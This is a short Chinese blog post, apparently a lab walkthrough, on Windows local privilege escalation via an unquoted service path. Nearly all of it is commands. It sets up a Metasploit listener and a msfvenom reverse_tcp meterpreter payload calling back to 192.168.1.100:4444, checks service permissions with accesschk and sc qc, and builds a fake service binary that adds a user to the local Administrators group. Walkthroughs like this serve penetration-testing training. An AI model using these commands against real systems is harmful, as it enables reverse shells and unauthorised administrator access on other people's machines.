未打引号的路径&windows本地提权 发表于 2020-02-15 | 分类于 windows | 阅读数 次 我录制了一个演示视频 meterpreter开启监听 123456789msfconsole handler -H 192.168.1.100 -P 4444 -p windows/x64/meterpreter/reverse_tcp msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe search trusted_service use 0 set session 1 run 查看服务权限 12345C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc unquotedsvc C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe /accepteula -uwcqv user * sc qc unquotedsvc 生成伪造的服务 1234msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe sc start unquotedsvc net localgroup administrators